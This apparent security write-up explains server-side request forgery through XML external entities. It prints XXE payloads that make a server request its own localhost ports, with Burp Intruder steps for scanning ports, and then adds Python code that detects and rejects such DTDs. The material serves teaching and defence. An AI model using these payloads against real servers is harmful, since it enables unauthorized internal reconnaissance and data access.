Understanding SSRF in a XXE Context
Tags: SSRF, XXE, Cybersecurity, Network Scanning, Vulnerability Exploitation
This content is an AI-generated summary. If you encounter any misinformation or problematic content, please report it to cyb.hub@proton.me.
Server-Side Request Forgery (SSRF) in an XML External Entity (XXE) context allows attackers to manipulate XML input, causing the server to issue requests to internal services or access internal files. This can lead to unauthorized access and potential data breaches.
Key Points
- SSRF: Server-Side Request Forgery is a vulnerability where an attacker can manipulate a server to make requests to internal services.
- XXE: XML External Entity is a vulnerability where an attacker can manipulate XML input to access internal files or services.
- Combined Threat: When XXE is used to trigger SSRF, the attacker can scan the internal network from the server's position and reach sensitive information that is not exposed externally.
Internal Network Scanning
Attackers can use XXE to perform internal network scanning by manipulating XML payloads. Here’s an example of how this can be done:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://localhost:§10§/" >
]>
<contact>
<name>&xxe;</name>
<email>test@test.com</email>
<message>test</message>
</contact>
Steps to Perform Internal Network Scanning
- Intercept the Request: Use a tool like Burp Proxy to intercept the request.
- Send to Intruder: Send the intercepted request to Burp Intruder.
- Brute Force: Brute force the §10§ placeholder (the port number in the entity's URL) to search for internal services running on the server.
- Sort Results: Sort the results by size to identify running services.
Example of Successful Attack
In one case, the server was open on port 81. The following payload was used to access the service:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://localhost:81/" >
]>
<contact>
<name>&xxe;</name>
<email>test@test.com</email>
<message>test</message>
</contact>
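From the defender's side, the fix for this whole class of issue is to refuse entity declarations in untrusted XML before the parser has a chance to resolve them, and the triage signal is an ENTITY whose SYSTEM identifier points at loopback, private or file targets. The following is an added example, not code from the original summary or from the writeup it describes: it uses Python's expat declaration callbacks to inspect the DTD without fetching anything, classifies the entity target, and wraps ElementTree in a hardened entry point that rejects any DOCTYPE. The sample documents, the function names and the classification labels are constructed for this example.

```python
import ipaddress
import xml.etree.ElementTree as ET
import xml.parsers.expat
from urllib.parse import urlsplit

# Constructed sample: the payload shape shown above, entity pointing at a loopback port.
XXE_SAMPLE = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://localhost:81/" >
]>
<contact>
<name>&xxe;</name>
<email>test@test.com</email>
<message>test</message>
</contact>"""

# Constructed sample: a benign contact form submission with no DTD.
CLEAN_SAMPLE = b"<contact><name>alice</name><email>a@example.com</email><message>hi</message></contact>"


class DtdRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE, which is where entities are declared."""


def inspect_dtd(xml_bytes):
    """Scan the DTD using expat's declaration callbacks and report
    {'doctype': bool, 'external_entities': [(name, system_id), ...]}.
    Nothing is fetched: the external-reference callback only acknowledges the
    reference, so the URL in the entity is never contacted."""
    report = {"doctype": False, "external_entities": []}
    p = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = True

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None:  # SYSTEM/PUBLIC identifier => external entity
            report["external_entities"].append((name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        return 1  # non-zero tells expat to continue without loading the entity

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity_decl
    p.ExternalEntityRefHandler = on_external_ref
    p.Parse(xml_bytes, True)
    return report


def classify_target(system_id):
    """Triage label for an entity's SYSTEM identifier: 'file', 'loopback',
    'private' or 'external'. Loopback and private targets are the SSRF cases."""
    parts = urlsplit(system_id)
    if parts.scheme in ("", "file"):
        return "file"
    host = parts.hostname or ""
    if host == "localhost":
        return "loopback"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "external"  # a DNS name; resolve it before deciding in production
    if addr.is_loopback:
        return "loopback"
    if addr.is_private or addr.is_link_local:
        return "private"
    return "external"


def parse_untrusted(xml_bytes):
    """Hardened entry point: refuse any document with a DOCTYPE, then parse.
    With no DTD there are no entity declarations for the parser to resolve."""
    if inspect_dtd(xml_bytes)["doctype"]:
        raise DtdRejected("DOCTYPE not permitted in untrusted input")
    return ET.fromstring(xml_bytes)


def accepts(xml_bytes):
    """True if parse_untrusted accepts the document, False if it rejects the DTD."""
    try:
        parse_untrusted(xml_bytes)
        return True
    except DtdRejected:
        return False


if __name__ == "__main__":
    report = inspect_dtd(XXE_SAMPLE)
    for name, sysid in report["external_entities"]:
        print(f"entity {name!r} -> {sysid} [{classify_target(sysid)}]")
    print("clean accepted:", accepts(CLEAN_SAMPLE), "| xxe accepted:", accepts(XXE_SAMPLE))
```

Rejecting the DOCTYPE outright is the simplest robust policy for a form endpoint that never legitimately needs a DTD; where a DTD is required, disable external entity resolution in the parser and apply the target classification to what remains. Run over request logs, `inspect_dtd` plus `classify_target` turns the port-scanning pattern described above (many requests differing only in the loopback port) into an alert on the first `loopback` hit.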